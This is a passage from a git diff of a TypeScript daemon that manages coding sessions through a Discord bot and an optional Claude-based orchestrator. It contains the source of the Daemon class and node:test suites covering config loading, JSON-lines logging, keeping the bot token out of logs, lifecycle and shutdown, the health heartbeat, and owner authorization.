(cleanupDirs.length) { + const d = cleanupDirs.pop()!; + if (existsSync(d)) rmSync(d, { recursive: true, force: true }); + } +}); + +// ---------- config ---------- + +describe('resolveConfigPath', () => { + it('prefers explicit CLI path', () => { + const p = resolveConfigPath('/custom/config.yaml'); + assert.equal(p, '/custom/config.yaml'); + }); + + it('expands ~ in CLI path', () => { + const p = resolveConfigPath('~/my-daemon.yaml'); + assert.ok(p.startsWith(homedir())); + assert.ok(p.endsWith('my-daemon.yaml')); + }); + + it('falls back to GSD_DAEMON_CONFIG env var', () => { + const prev = process.env['GSD_DAEMON_CONFIG']; + try { + process.env['GSD_DAEMON_CONFIG'] = 
'/env/path.yaml'; + const p = resolveConfigPath(); + assert.equal(p, '/env/path.yaml'); + } finally { + if (prev === undefined) delete process.env['GSD_DAEMON_CONFIG']; + else process.env['GSD_DAEMON_CONFIG'] = prev; + } + }); + + it('defaults to ~/.gsd/daemon.yaml', () => { + const prev = process.env['GSD_DAEMON_CONFIG']; + try { + delete process.env['GSD_DAEMON_CONFIG']; + const p = resolveConfigPath(); + assert.equal(p, join(homedir(), '.gsd', 'daemon.yaml')); + } finally { + if (prev !== undefined) process.env['GSD_DAEMON_CONFIG'] = prev; + } + }); +}); + +describe('loadConfig', () => { + // Save and clear DISCORD_BOT_TOKEN for this suite — env override interferes with file-token assertions + let savedToken: string | undefined; + before(() => { + savedToken = process.env['DISCORD_BOT_TOKEN']; + delete process.env['DISCORD_BOT_TOKEN']; + }); + afterEach(() => {}); // cleanup dirs handled by top-level afterEach + // Restore after all tests in this suite + after(() => { + if (savedToken !== undefined) process.env['DISCORD_BOT_TOKEN'] = savedToken; + }); + + it('parses valid YAML config', () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const configPath = join(dir, 'daemon.yaml'); + writeFileSync(configPath, ` +discord: + token: "test-token-123" + guild_id: "g1" + owner_id: "o1" +projects: + scan_roots: + - ~/projects + - /absolute/path +log: + file: ~/logs/daemon.log + level: debug + max_size_mb: 100 +`); + const cfg = loadConfig(configPath); + assert.equal(cfg.discord?.token, 'test-token-123'); + assert.equal(cfg.discord?.guild_id, 'g1'); + assert.equal(cfg.log.level, 'debug'); + assert.equal(cfg.log.max_size_mb, 100); + assert.ok(cfg.log.file.startsWith(homedir())); + assert.ok(cfg.projects.scan_roots[0]!.startsWith(homedir())); + assert.equal(cfg.projects.scan_roots[1], '/absolute/path'); + }); + + it('returns defaults when config file is missing', () => { + const cfg = loadConfig('/nonexistent/path/daemon.yaml'); + assert.equal(cfg.log.level, 
'info'); + assert.equal(cfg.log.max_size_mb, 50); + assert.ok(cfg.log.file.endsWith('daemon.log')); + assert.deepEqual(cfg.projects.scan_roots, []); + assert.equal(cfg.discord, undefined); + }); + + it('throws on malformed YAML', () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const configPath = join(dir, 'bad.yaml'); + writeFileSync(configPath, ':\n :\n bad: [unclosed'); + assert.throws(() => loadConfig(configPath), (err: unknown) => { + assert.ok(err instanceof Error); + assert.ok(err.message.includes('Failed to parse YAML')); + assert.ok(err.message.includes(configPath)); + return true; + }); + }); + + it('returns defaults for empty YAML file', () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const configPath = join(dir, 'empty.yaml'); + writeFileSync(configPath, ''); + const cfg = loadConfig(configPath); + assert.equal(cfg.log.level, 'info'); + assert.equal(cfg.log.max_size_mb, 50); + assert.deepEqual(cfg.projects.scan_roots, []); + }); +}); + +describe('validateConfig', () => { + // Save and clear DISCORD_BOT_TOKEN for tests that don't expect it + let savedToken: string | undefined; + before(() => { + savedToken = process.env['DISCORD_BOT_TOKEN']; + delete process.env['DISCORD_BOT_TOKEN']; + }); + after(() => { + if (savedToken !== undefined) process.env['DISCORD_BOT_TOKEN'] = savedToken; + }); + + it('fills remaining defaults for partial config', () => { + const cfg = validateConfig({ projects: { scan_roots: ['/a'] } }); + assert.equal(cfg.log.level, 'info'); + assert.equal(cfg.log.max_size_mb, 50); + assert.ok(cfg.log.file.endsWith('daemon.log')); + assert.deepEqual(cfg.projects.scan_roots, ['/a']); + assert.equal(cfg.discord, undefined); + }); + + it('falls back to info for invalid log level', () => { + const cfg = validateConfig({ log: { level: 'trace' } }); + assert.equal(cfg.log.level, 'info'); + }); + + it('returns full defaults for null input', () => { + const cfg = validateConfig(null); + assert.equal(cfg.log.level, 'info'); + 
assert.equal(cfg.log.max_size_mb, 50); + }); + + it('returns full defaults for non-object input', () => { + const cfg = validateConfig('not-an-object'); + assert.equal(cfg.log.level, 'info'); + }); + + it('expands ~ in log file path', () => { + const cfg = validateConfig({ log: { file: '~/my.log' } }); + assert.ok(cfg.log.file.startsWith(homedir())); + assert.ok(cfg.log.file.endsWith('my.log')); + }); + + it('overrides discord token from DISCORD_BOT_TOKEN env var', () => { + const prev = process.env['DISCORD_BOT_TOKEN']; + try { + process.env['DISCORD_BOT_TOKEN'] = 'env-override-token'; + const cfg = validateConfig({ + discord: { token: 'file-token', guild_id: 'g1', owner_id: 'o1' }, + }); + assert.equal(cfg.discord?.token, 'env-override-token'); + assert.equal(cfg.discord?.guild_id, 'g1'); + } finally { + if (prev === undefined) delete process.env['DISCORD_BOT_TOKEN']; + else process.env['DISCORD_BOT_TOKEN'] = prev; + } + }); + + it('creates discord block from env var even when absent in config', () => { + const prev = process.env['DISCORD_BOT_TOKEN']; + try { + process.env['DISCORD_BOT_TOKEN'] = 'env-only-token'; + const cfg = validateConfig({}); + assert.equal(cfg.discord?.token, 'env-only-token'); + } finally { + if (prev === undefined) delete process.env['DISCORD_BOT_TOKEN']; + else process.env['DISCORD_BOT_TOKEN'] = prev; + } + }); +}); + +// ---------- logger ---------- + +describe('Logger', () => { + it('writes JSON-lines entries to file', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'test.log'); + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + logger.info('hello world'); + logger.debug('detail', { key: 'val' }); + await logger.close(); + + const lines = readFileSync(logPath, 'utf-8').trim().split('\n'); + assert.equal(lines.length, 2); + + const entry0: LogEntry = JSON.parse(lines[0]!); + assert.equal(entry0.level, 'info'); + assert.equal(entry0.msg, 'hello world'); + 
assert.ok(entry0.ts); // ISO-8601 + + const entry1: LogEntry = JSON.parse(lines[1]!); + assert.equal(entry1.level, 'debug'); + assert.equal(entry1.msg, 'detail'); + assert.deepEqual(entry1.data, { key: 'val' }); + }); + + it('filters entries below configured level', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'filter.log'); + + const logger = new Logger({ filePath: logPath, level: 'warn' }); + logger.debug('should not appear'); + logger.info('should not appear either'); + logger.warn('visible warning'); + logger.error('visible error'); + await logger.close(); + + const lines = readFileSync(logPath, 'utf-8').trim().split('\n'); + assert.equal(lines.length, 2); + assert.equal((JSON.parse(lines[0]!) as LogEntry).level, 'warn'); + assert.equal((JSON.parse(lines[1]!) as LogEntry).level, 'error'); + }); + + it('close() resolves after stream ends', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'close.log'); + + const logger = new Logger({ filePath: logPath, level: 'info' }); + logger.info('before close'); + await logger.close(); + + // File should be readable and contain the entry + const content = readFileSync(logPath, 'utf-8'); + assert.ok(content.includes('before close')); + }); + + it('creates parent directories if they do not exist', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'nested', 'deep', 'test.log'); + + const logger = new Logger({ filePath: logPath, level: 'info' }); + logger.info('nested dir test'); + await logger.close(); + + assert.ok(existsSync(logPath)); + const content = readFileSync(logPath, 'utf-8'); + assert.ok(content.includes('nested dir test')); + }); + + it('does not include data field when not provided', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'nodata.log'); + + const logger = new Logger({ filePath: logPath, level: 'info' }); + logger.info('no extra data'); + 
await logger.close(); + + const entry: LogEntry = JSON.parse(readFileSync(logPath, 'utf-8').trim()); + assert.equal(entry.data, undefined); + // Also verify the raw JSON doesn't contain "data" key + assert.ok(!readFileSync(logPath, 'utf-8').includes('"data"')); + }); +}); + +// ---------- token safety ---------- + +describe('token safety', () => { + it('discord token never appears in log output', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'token-safety.log'); + + // Config with a token + const prev = process.env['DISCORD_BOT_TOKEN']; + try { + process.env['DISCORD_BOT_TOKEN'] = 'super-secret-token-value'; + const cfg = validateConfig({}); + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + // Log the config object — token must not leak + logger.info('config loaded', { discord_configured: !!cfg.discord }); + logger.debug('startup complete'); + await logger.close(); + + const content = readFileSync(logPath, 'utf-8'); + assert.ok(!content.includes('super-secret-token-value')); + } finally { + if (prev === undefined) delete process.env['DISCORD_BOT_TOKEN']; + else process.env['DISCORD_BOT_TOKEN'] = prev; + } + }); +}); + +// ---------- daemon lifecycle ---------- + +// Resolve the dist/ directory for spawning CLI +const __filename = fileURLToPath(import.meta.url); +const __dirname = dirname(__filename); + +describe('Daemon', () => { + it('logs lifecycle events on start and shutdown', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'daemon-lifecycle.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: ['/a', '/b'] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + // start() should have logged 'daemon started' + // shutdown() directly — we override process.exit to 
prevent test runner from dying + const origExit = process.exit; + let exitCode: number | undefined; + // @ts-expect-error — overriding process.exit for test + process.exit = (code?: number) => { exitCode = code ?? 0; }; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + assert.equal(exitCode, 0); + + const content = readFileSync(logPath, 'utf-8'); + const lines = content.trim().split('\n'); + + // First line: daemon started + const startEntry: LogEntry = JSON.parse(lines[0]!); + assert.equal(startEntry.msg, 'daemon started'); + assert.equal(startEntry.data?.scan_roots, 2); + assert.equal(startEntry.data?.discord_configured, false); + + // Second line: daemon shutting down + const stopEntry: LogEntry = JSON.parse(lines[1]!); + assert.equal(stopEntry.msg, 'daemon shutting down'); + }); + + it('shutdown is idempotent — second call is a no-op', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'idempotent.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + const origExit = process.exit; + let exitCount = 0; + // @ts-expect-error — overriding process.exit for test + process.exit = () => { exitCount++; }; + try { + await daemon.shutdown(); + await daemon.shutdown(); // second call — should be no-op + } finally { + process.exit = origExit; + } + + assert.equal(exitCount, 1, 'process.exit should be called exactly once'); + + const lines = readFileSync(logPath, 'utf-8').trim().split('\n'); + const shutdownLines = lines.filter(l => { + const e: LogEntry = JSON.parse(l); + return e.msg === 'daemon shutting down'; + }); + assert.equal(shutdownLines.length, 1, 'shutdown log should appear exactly once'); + }); +}); + +// ---------- Health heartbeat ---------- 
+ +describe('Health heartbeat', () => { + it('logs health entry with expected fields after interval tick', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'health.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + // Use 50ms interval for fast test + const daemon = new Daemon(config, logger, 50); + + await daemon.start(); + + // Wait for at least one health tick + await new Promise((r) => setTimeout(r, 120)); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + const content = readFileSync(logPath, 'utf-8'); + const lines = content.trim().split('\n'); + const healthLines = lines.filter((l) => { + const e: LogEntry = JSON.parse(l); + return e.msg === 'health'; + }); + + assert.ok(healthLines.length >= 1, 'should have at least one health log entry'); + + const entry: LogEntry = JSON.parse(healthLines[0]!); + assert.equal(entry.msg, 'health'); + assert.equal(typeof entry.data?.uptime_s, 'number'); + assert.equal(typeof entry.data?.active_sessions, 'number'); + assert.equal(typeof entry.data?.discord_connected, 'boolean'); + assert.equal(typeof entry.data?.memory_rss_mb, 'number'); + assert.equal(entry.data?.discord_connected, false); // no discord configured + assert.equal(entry.data?.active_sessions, 0); // no sessions + }); + + it('health timer is cleared on shutdown — no lingering intervals', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'health-cleanup.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: 
logPath, level: 'info' }); + // Use 50ms interval + const daemon = new Daemon(config, logger, 50); + + await daemon.start(); + + // Wait for one tick + await new Promise((r) => setTimeout(r, 80)); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + // Count health entries at shutdown + const contentAtShutdown = readFileSync(logPath, 'utf-8'); + const healthCountAtShutdown = contentAtShutdown + .trim() + .split('\n') + .filter((l) => JSON.parse(l).msg === 'health').length; + + // Wait another interval — no new health entries should appear + await new Promise((r) => setTimeout(r, 120)); + + // Re-read (logger is closed, so file shouldn't change) + const contentAfterWait = readFileSync(logPath, 'utf-8'); + const healthCountAfterWait = contentAfterWait + .trim() + .split('\n') + .filter((l) => JSON.parse(l).msg === 'health').length; + + assert.equal( + healthCountAfterWait, + healthCountAtShutdown, + 'no new health entries should appear after shutdown', + ); + }); +}); + +describe('CLI integration', () => { + it('--help prints usage and exits 0', () => { + const result = execFileSync( + process.execPath, + [join(__dirname, 'cli.js'), '--help'], + { encoding: 'utf-8', timeout: 5000 }, + ); + assert.ok(result.includes('Usage: gsd-daemon')); + assert.ok(result.includes('--config')); + assert.ok(result.includes('--verbose')); + }); + + it('starts, logs to file, and exits cleanly on SIGTERM', { timeout: 15000 }, async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'integration.log'); + const configPath = join(dir, 'daemon.yaml'); + + writeFileSync(configPath, ` +projects: + scan_roots: + - /tmp/test-project +log: + file: "${logPath}" + level: info + max_size_mb: 10 +`); + + // Use execFile with a wrapper script approach: spawn, wait for start, SIGTERM, verify + const exitCode = await new 
Promise((resolve, reject) => { + const child = spawn( + process.execPath, + [join(__dirname, 'cli.js'), '--config', configPath], + { stdio: 'ignore' }, + ); + + let resolved = false; + child.on('error', (err) => { if (!resolved) { resolved = true; reject(err); } }); + child.on('exit', (code) => { if (!resolved) { resolved = true; resolve(code ?? 1); } }); + + // Poll for startup, then send SIGTERM + const poll = setInterval(() => { + if (existsSync(logPath)) { + const content = readFileSync(logPath, 'utf-8'); + if (content.includes('daemon started')) { + clearInterval(poll); + child.kill('SIGTERM'); + } + } + }, 100); + + // Safety: kill child if it takes too long + setTimeout(() => { + clearInterval(poll); + if (!resolved) { + child.kill('SIGKILL'); + resolved = true; + reject(new Error('timed out waiting for daemon')); + } + }, 10000); + }); + + assert.equal(exitCode, 0, 'daemon should exit with code 0 on SIGTERM'); + + // Small delay for filesystem flush + await new Promise(r => setTimeout(r, 100)); + + // Verify log file contents + const finalContent = readFileSync(logPath, 'utf-8'); + assert.ok(finalContent.includes('daemon started'), 'log should contain startup entry'); + assert.ok(finalContent.includes('daemon shutting down'), 'log should contain shutdown entry'); + + // Verify log entries are valid JSON-lines + const lines = finalContent.trim().split('\n'); + for (const line of lines) { + const entry: LogEntry = JSON.parse(line); + assert.ok(entry.ts, 'each entry should have a timestamp'); + assert.ok(entry.level, 'each entry should have a level'); + assert.ok(entry.msg, 'each entry should have a message'); + } + }); + + it('exits with code 1 on invalid config', () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const configPath = join(dir, 'bad.yaml'); + writeFileSync(configPath, ':\n :\n bad: [unclosed'); + + try { + execFileSync( + process.execPath, + [join(__dirname, 'cli.js'), '--config', configPath], + { encoding: 'utf-8', timeout: 5000 }, + 
); + assert.fail('should have thrown'); + } catch (err: unknown) { + // execFileSync throws on non-zero exit + const execErr = err as { status: number; stderr: string }; + assert.equal(execErr.status, 1); + assert.ok(execErr.stderr.includes('fatal')); + } + }); +}); + +// ---------- Daemon + SessionManager integration ---------- + +describe('Daemon integration', () => { + it('getSessionManager() returns SessionManager after start()', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'daemon-sm.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + const sm = daemon.getSessionManager(); + assert.ok(sm instanceof SessionManager); + + // Clean shutdown + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + }); + + it('getSessionManager() throws before start()', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'daemon-nostart.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + assert.throws( + () => daemon.getSessionManager(), + (err: Error) => { + assert.ok(err.message.includes('Daemon not started')); + return true; + } + ); + + // Close logger to prevent async write stream from hitting cleaned-up tmpdir + await logger.close(); + }); + + it('scanProjects() delegates to scanForProjects with configured roots', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const 
logPath = join(dir, 'daemon-scan.log'); + + // Create a fake project root with a project that has a .git marker + const scanRoot = join(dir, 'projects'); + mkdirSync(scanRoot); + const projectDir = join(scanRoot, 'my-project'); + mkdirSync(projectDir); + mkdirSync(join(projectDir, '.git')); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [scanRoot] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + const projects = await daemon.scanProjects(); + assert.ok(projects.length >= 1); + const found = projects.find(p => p.name === 'my-project'); + assert.ok(found); + assert.ok(found.markers.includes('git')); + + // Clean shutdown + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + }); + + it('shutdown cleans up sessionManager before closing logger', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'daemon-cleanup.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'info', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'info' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + // Access sessionManager to verify it exists + const sm = daemon.getSessionManager(); + assert.ok(sm); + + // Shutdown — should not throw even though sessionManager has no active sessions + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + // Verify log contains both started and shutting down + const content = readFileSync(logPath, 'utf-8'); + 
assert.ok(content.includes('daemon started'));
+    assert.ok(content.includes('daemon shutting down'));
+  });
+});
diff --git a/packages/daemon/src/daemon.ts b/packages/daemon/src/daemon.ts
new file mode 100644
index 000000000..8b1db3db6
--- /dev/null
+++ b/packages/daemon/src/daemon.ts
@@ -0,0 +1,199 @@
+import type { DaemonConfig, ProjectInfo } from './types.js';
+import type { Logger } from './logger.js';
+import { SessionManager } from './session-manager.js';
+import { scanForProjects } from './project-scanner.js';
+import { DiscordBot, validateDiscordConfig } from './discord-bot.js';
+import { EventBridge } from './event-bridge.js';
+import { Orchestrator } from './orchestrator.js';
+
+/**
+ * Core daemon class — ties config + logger together with lifecycle management.
+ * Registers SIGTERM/SIGINT handlers for clean shutdown.
+ */
+export class Daemon {
+  private shuttingDown = false;
+  private keepaliveTimer: ReturnType<typeof setInterval> | undefined;
+  private healthTimer: ReturnType<typeof setInterval> | undefined;
+  private readonly onSigterm: () => void;
+  private readonly onSigint: () => void;
+  private sessionManager: SessionManager | undefined;
+  private discordBot: DiscordBot | undefined;
+  private eventBridge: EventBridge | undefined;
+  private orchestrator: Orchestrator | undefined;
+
+  constructor(
+    private readonly config: DaemonConfig,
+    private readonly logger: Logger,
+    private readonly healthIntervalMs: number = 300_000,
+  ) {
+    this.onSigterm = () => void this.shutdown();
+    this.onSigint = () => void this.shutdown();
+  }
+
+  /** Start the daemon: log startup info, register signal handlers, start keepalive.
 */
+  async start(): Promise<void> {
+    this.sessionManager = new SessionManager(this.logger);
+
+    this.logger.info('daemon started', {
+      log_level: this.config.log.level,
+      scan_roots: this.config.projects.scan_roots.length,
+      discord_configured: !!this.config.discord,
+    });
+
+    process.on('SIGTERM', this.onSigterm);
+    process.on('SIGINT', this.onSigint);
+
+    // Keep the event loop alive. The write stream alone doesn't hold a ref
+    // when there's no pending I/O, so we need an explicit timer.
+    this.keepaliveTimer = setInterval(() => {}, 60_000);
+
+    // Conditionally start Discord bot if config is present and valid
+    if (this.config.discord?.token) {
+      try {
+        validateDiscordConfig(this.config.discord);
+        this.discordBot = new DiscordBot({
+          config: this.config.discord,
+          logger: this.logger,
+          sessionManager: this.sessionManager,
+          scanProjects: () => this.scanProjects(),
+        });
+        await this.discordBot.login();
+
+        // Wire up EventBridge after bot is ready
+        const channelManager = this.discordBot.getChannelManager();
+        const client = this.discordBot.getClient();
+        if (channelManager && client) {
+          this.eventBridge = new EventBridge({
+            sessionManager: this.sessionManager,
+            channelManager,
+            client,
+            config: this.config,
+            logger: this.logger,
+            ownerId: this.config.discord.owner_id,
+          });
+          this.discordBot.setEventBridge(this.eventBridge);
+          this.eventBridge.start();
+          this.logger.info('event bridge wired');
+
+          // Wire up Orchestrator if control_channel_id is configured
+          if (this.config.discord.control_channel_id) {
+            this.orchestrator = new Orchestrator({
+              sessionManager: this.sessionManager,
+              channelManager,
+              scanProjects: () => this.scanProjects(),
+              config: {
+                model: this.config.discord.orchestrator?.model ?? 'claude-haiku-4-5-20251001',
+                max_tokens: this.config.discord.orchestrator?.max_tokens ??
1024,
+                control_channel_id: this.config.discord.control_channel_id,
+              },
+              logger: this.logger,
+              ownerId: this.config.discord.owner_id,
+            });
+            client.on('messageCreate', (message) => {
+              void this.orchestrator!.handleMessage(message);
+            });
+            this.logger.info('orchestrator wired', {
+              control_channel_id: this.config.discord.control_channel_id,
+            });
+          }
+        } else {
+          this.logger.warn('event bridge skipped — channel manager or client not available');
+        }
+      } catch (err) {
+        // Log error but don't abort daemon startup — bot is optional
+        this.logger.error('discord bot login failed', {
+          error: err instanceof Error ? err.message : String(err),
+        });
+        this.discordBot = undefined;
+      }
+    }
+
+    // Health heartbeat — logs uptime, session count, Discord status, memory
+    const startTime = Date.now();
+    this.healthTimer = setInterval(() => {
+      const sessions = this.sessionManager?.getAllSessions() ?? [];
+      const activeSessions = sessions.filter(
+        (s) => s.status === 'running' || s.status === 'blocked',
+      ).length;
+      this.logger.info('health', {
+        uptime_s: Math.floor((Date.now() - startTime) / 1000),
+        active_sessions: activeSessions,
+        discord_connected: !!this.discordBot?.getClient()?.isReady(),
+        memory_rss_mb: Math.round(process.memoryUsage().rss / 1024 / 1024),
+      });
+    }, this.healthIntervalMs);
+  }
+
+  /** Scan configured project roots for project directories. */
+  async scanProjects(): Promise<ProjectInfo[]> {
+    return scanForProjects(this.config.projects.scan_roots);
+  }
+
+  /** Accessor for the session manager (available after start()). */
+  getSessionManager(): SessionManager {
+    if (!this.sessionManager) {
+      throw new Error('Daemon not started — call start() before accessing the session manager');
+    }
+    return this.sessionManager;
+  }
+
+  /** Accessor for the event bridge (available after start() with Discord configured).
 */
+  getEventBridge(): EventBridge | undefined {
+    return this.eventBridge;
+  }
+
+  /** Accessor for the orchestrator (available after start() with control_channel_id configured). */
+  getOrchestrator(): Orchestrator | undefined {
+    return this.orchestrator;
+  }
+
+  /** Idempotent shutdown: log, cleanup sessions, close logger, exit. */
+  async shutdown(): Promise<void> {
+    if (this.shuttingDown) return;
+    this.shuttingDown = true;
+
+    this.logger.info('daemon shutting down');
+
+    // Remove signal handlers to avoid double-fire
+    process.removeListener('SIGTERM', this.onSigterm);
+    process.removeListener('SIGINT', this.onSigint);
+
+    // Clear health heartbeat timer
+    if (this.healthTimer) {
+      clearInterval(this.healthTimer);
+      this.healthTimer = undefined;
+    }
+
+    // Clear keepalive so the event loop can drain
+    if (this.keepaliveTimer) {
+      clearInterval(this.keepaliveTimer);
+      this.keepaliveTimer = undefined;
+    }
+
+    // Stop Orchestrator first
+    if (this.orchestrator) {
+      this.orchestrator.stop();
+      this.orchestrator = undefined;
+    }
+
+    // Stop EventBridge before Discord bot destroy
+    if (this.eventBridge) {
+      await this.eventBridge.stop();
+      this.eventBridge = undefined;
+    }
+
+    // Destroy Discord bot before session cleanup
+    if (this.discordBot) {
+      await this.discordBot.destroy();
+      this.discordBot = undefined;
+    }
+
+    // Clean up active sessions before closing logger
+    if (this.sessionManager) {
+      await this.sessionManager.cleanup();
+    }
+
+    await this.logger.close();
+    process.exit(0);
+  }
+}
diff --git a/packages/daemon/src/discord-bot.test.ts b/packages/daemon/src/discord-bot.test.ts
new file mode 100644
index 000000000..e450fd885
--- /dev/null
+++ b/packages/daemon/src/discord-bot.test.ts
@@ -0,0 +1,792 @@
+import { describe, it, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, readFileSync, rmSync, existsSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import { randomUUID
} from 'node:crypto'; +import { ChannelType } from 'discord.js'; +import { isAuthorized, validateDiscordConfig } from './discord-bot.js'; +import { sanitizeChannelName, ChannelManager } from './channel-manager.js'; +import { buildCommands, formatSessionStatus } from './commands.js'; +import { Daemon } from './daemon.js'; +import { Logger } from './logger.js'; +import { validateConfig } from './config.js'; +import type { DaemonConfig, LogEntry, ManagedSession } from './types.js'; + +// ---------- helpers ---------- + +function tmpDir(): string { + return mkdtempSync(join(tmpdir(), `discord-test-${randomUUID().slice(0, 8)}-`)); +} + +const cleanupDirs: string[] = []; +afterEach(() => { + while (cleanupDirs.length) { + const d = cleanupDirs.pop()!; + if (existsSync(d)) rmSync(d, { recursive: true, force: true }); + } +}); + +// ---------- isAuthorized ---------- + +describe('isAuthorized', () => { + it('returns true when userId matches ownerId', () => { + assert.equal(isAuthorized('12345', '12345'), true); + }); + + it('returns false when userId does not match ownerId', () => { + assert.equal(isAuthorized('12345', '99999'), false); + }); + + it('returns false when ownerId is empty', () => { + assert.equal(isAuthorized('12345', ''), false); + }); + + it('returns false when userId is empty', () => { + assert.equal(isAuthorized('', '12345'), false); + }); + + it('returns false when both are empty', () => { + assert.equal(isAuthorized('', ''), false); + }); +}); + +// ---------- validateDiscordConfig ---------- + +describe('validateDiscordConfig', () => { + it('passes with all required fields', () => { + assert.doesNotThrow(() => { + validateDiscordConfig({ + token: 'test-token', + guild_id: 'g123', + owner_id: 'o456', + }); + }); + }); + + it('throws on undefined config', () => { + assert.throws( + () => validateDiscordConfig(undefined), + (err: Error) => { + assert.ok(err.message.includes('undefined')); + return true; + }, + ); + }); + + it('throws on missing token', () 
=> { + assert.throws( + () => validateDiscordConfig({ token: '', guild_id: 'g1', owner_id: 'o1' }), + (err: Error) => { + assert.ok(err.message.includes('token')); + return true; + }, + ); + }); + + it('throws on whitespace-only token', () => { + assert.throws( + () => validateDiscordConfig({ token: ' ', guild_id: 'g1', owner_id: 'o1' }), + (err: Error) => { + assert.ok(err.message.includes('token')); + return true; + }, + ); + }); + + it('throws on missing guild_id', () => { + assert.throws( + () => validateDiscordConfig({ token: 'tok', guild_id: '', owner_id: 'o1' }), + (err: Error) => { + assert.ok(err.message.includes('guild_id')); + return true; + }, + ); + }); + + it('throws on missing owner_id', () => { + assert.throws( + () => validateDiscordConfig({ token: 'tok', guild_id: 'g1', owner_id: '' }), + (err: Error) => { + assert.ok(err.message.includes('owner_id')); + return true; + }, + ); + }); +}); + +// ---------- Daemon wiring ---------- + +describe('Daemon + DiscordBot wiring', () => { + it('does not create DiscordBot when discord config is absent', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'no-discord.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'debug', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + const content = readFileSync(logPath, 'utf-8'); + // Should NOT have any bot-related log entries + assert.ok(!content.includes('bot ready')); + assert.ok(!content.includes('discord bot login failed')); + assert.ok(!content.includes('bot destroyed')); + }); + + it('logs error when discord config has token but login 
